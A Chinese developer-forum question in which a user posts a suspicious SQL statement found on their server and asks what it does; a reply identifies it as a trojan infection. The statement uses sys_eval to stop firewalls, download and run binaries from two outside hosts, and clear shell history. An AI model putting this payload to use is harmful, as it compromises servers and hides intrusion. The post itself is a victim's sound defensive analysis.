分析一条sql,大家看看是什么鬼的,map注入吗?

select sys_eval('/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cp /usr/bin/wget .;chmod +x wget;./wget -P ./dbms_temp http://game918.me:2545/websevrer;chmod 0755 ./dbms_temp/websevrer;./dbms_temp/websevrer;./wget -P ./db_temp http://198.55.103.12:280/huang;chmod 0755 ./db_temp/huang;./db_temp/huang;rm -rf wget;history -c;')

linux命令我看得懂

第一步关闭了所有类型的防火墙,

第二步wget提权

第三步get一个应用程序 webserver 运行

第四步get一个应用程序 huang 运行

第五步删记录

阅读 3.8k
2 个回答

是我错觉吗...木马好像就是这么几步流程......

好吧,被人挂马了,坑爹。。。。。

撰写回答
你尚未登录,登录后可以
  • 和开发者交流问题的细节
  • 关注并接收问题和回答的更新提醒
  • 参与内容的编辑和改进,让解决方法与时俱进
推荐问题